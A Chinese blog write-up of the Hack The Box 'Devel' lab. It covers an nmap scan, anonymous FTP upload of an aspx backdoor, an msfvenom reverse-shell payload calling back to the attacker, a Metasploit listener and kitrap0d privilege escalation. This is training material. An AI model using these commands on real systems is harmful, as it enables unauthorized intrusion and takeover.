1. Toy模板网首页
  2. > Toy博客

【Hack The Box】windows练习-- devel

7月前 分类:Toy博客 阅读(32) 违法举报

这篇具有很好参考价值的文章主要介绍了【Hack The Box】windows练习-- devel。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

HTB 学习笔记

【Hack The Box】windows练习-- devel

🔥系列专栏:Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年10月28日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

信息收集

Starting Nmap 7.93 ( https://nmap.org ) at 2022-10-28 08:24 EDT
Nmap scan report for 10.129.6.232
Host is up (0.67s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS7

ftp允许匿名登陆
还有一个80页面
【Hack The Box】windows练习-- devel

ftp枚举

匿名登陆
Anonymous
【Hack The Box】windows练习-- devel
发现有一个图片,get下载到本地之后发现
就是80页面的首页
那就试试上传,看能不能直接上传上去一个后门

后门植入

【Hack The Box】windows练习-- devel成功上传,那接下来就生成payload

生成payload

msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows

这里之所以生成aspx的后门文件是因为使用了iis文件
【Hack The Box】windows练习-- devel成功上传(这里注意,要清楚自己设置的什么端口)
【Hack The Box】windows练习-- devel
但是可以看到我们自己做的shell完全执行不了命令,linux中常用的几个稳定反弹shell的方法都用不了了,但是我不想用msf,因为这不利于我的oscp考试,于是我试图不利用msfvenom生成payload,但是这台机器中很多语言都没有(几乎没有任何语言。而针对于windows的shell门类我还欠缺很多)太遗憾了,只能使用msf接受shell了

msf利用

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
设置LHOST LPORT
然后run
然后去web访问一下那个aspx文件

提权

【Hack The Box】windows练习-- devel然后拿到shell
这里我认为完全可以上传winpeas等来枚举信息然后利用漏洞提权
但是我真的不知道有哪些脚本可以起到这个作用,我是一个windows新手
所以就简单的利用msf来提权了
这个靶场我会再做一次的
【Hack The Box】windows练习-- devel文章来源地址https://www.toymoban.com/news/detail-479357.html

meterpreter > background
[*] Backgrounding session 2...
msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set session 2
session => 2
msf5 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 29 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed


use post/multi/recon/local_exploit_suggester
use exploit/windows/local/ms10_015_kitrap0d
然后run即可

到了这里,关于【Hack The Box】windows练习-- devel的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

分享到:
领支付宝红包 赞助服务器费用

相关文章

  • hack the box responder

    hack the box responder

    回答:badminton 首先启动responder并监听本地的tun0网卡,然后由于靶机存在RFI,因此可以远程访问本地的某个文件,使用responder拿到主机的administrator的哈希,然后使用john破解 使用responder监听本地tun0网卡 responder -I tun0

    2023年04月09日
    浏览(35)
  • Hack The Box - 关卡Dancing

    Hack The Box - 关卡Dancing

    SMB(全称是Server Message Block)是一个协议名,可用于在计算机间共享文件、打印机、串口等,电脑上的网上邻居就是靠它实现的。 SMB 是一种客户机/服务器、请求/响应协议。通过 SMB 协议,客户端应用程序可以在各种网络环境下读、写服务器上的文件,以及对服务器程序提出服务

    2024年02月06日
    浏览(30)
  • Hack The Box - Three(新手友好)

    Hack The Box - Three(新手友好)

    环境给了一个IP,nmap信息搜集一波 访问10.129.126.35:80,收集有用信息(渗透测试==信息收集) thetoppers.htb应该是域名,把域名和IP加到hosts文件中,tee命令的作用就是读取标准输入内容,将读取到的内容数据写入到标准输出和文件中。 再次访问和之前页面一样,尝试子域名爆破,

    2024年02月07日
    浏览(25)
  • Hack The Box-Sherlocks-Tracer

    Hack The Box-Sherlocks-Tracer

    A junior SOC analyst on duty has reported multiple alerts indicating the presence of PsExec on a workstation. They verified the alerts and escalated the alerts to tier II. As an Incident responder you triaged the endpoint for artefacts of interest. Now please answer the questions regarding this security event so you can report it to your incident manager. 一名

    2024年01月20日
    浏览(22)
  • Hack The Box - TIER 2 - Archetype Oopsie Vaccine Unified

    Hack The Box - TIER 2 - Archetype Oopsie Vaccine Unified

    这个阶段的,终于不是之前的傻乎乎操作了,到这我才知道,那些问答不是先问答再渗透的。原来是渗透一步回答相应问题,这里涉及到了许多工具、脚本、提权、端口等知识点,收获丰富。 TASK 1 Which TCP port is hosting a database server? 哪个 TCP 端口托管数据库服务器? 答案:1

    2024年02月05日
    浏览(37)
  • Hack The Box -SQL Injection Fundamentals Module详细讲解中文教程

    Hack The Box -SQL Injection Fundamentals Module详细讲解中文教程

    数据库介绍............................................................................................................... 3 数据库管理系统(DBMS)介绍........................................................................... 3 数据库的类型..................................................................................................

    2024年02月04日
    浏览(26)
  • 关于ros工作空间devel下setup.bash的理解

    关于ros工作空间devel下setup.bash的理解

    在创建了ros的工作空间之后 在工作空间的devel文件夹中存在几个 setup.*sh 形式的环境变量设置脚本 使用 source 命令运行这些脚本文件,则工作空间的环境变量设置可以生效(如可以找到该工作空间内的项目)。 source devel/setup.bash  设置环境变量是为了(source devel/setup.bash)系统能

    2024年02月11日
    浏览(30)

  • Digital Signal Processing for SubNyquist Signals Devel

    作者:禅与计算机程序设计艺术 In recent years, digital signal processing has been widely used in various fields such as speech recognition, image processing, biomedical engineering, etc. The development of high-end microprocessors with faster clock speeds and more computing power have enabled the researchers to process large amounts of data at a

    2024年02月07日
    浏览(23)
  • Ros终端出现找不到bash: /home/***/devel/setup.bash: 没有那个文件或目录

    Ros终端出现找不到bash: /home/***/devel/setup.bash: 没有那个文件或目录

    现象: Ros终端出现找不到bash: /home/***/devel/setup.bash: 没有那个文件或目录 问题: 配置时路径写错 A 解决方法:改正路径 1.打开文件  2.修改正确路径 B 粗暴解决:把上次写错的配置直接删除 1.显示隐藏文件 2.在主目录下打开 .bashrc 文件,把上次写入的配置直接删除,然后保存

    2024年02月15日
    浏览(36)

  • CSS Hack是什么?ie6,7,8的hack分别是什么

    CSS Hack是一种针对不同浏览器(如Internet Explorer、Firefox、Opera等)的CSS样式特殊写法,通过使用不同的CSS语法或者使用特定条件的判断语句,让CSS代码能够针对不同的浏览器进行差异化渲染,从而达到兼容的目的。 对于Internet Explorer 6、7、8,CSS Hack主要有以下几种写法: 条件

    2024年01月22日
    浏览(27)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包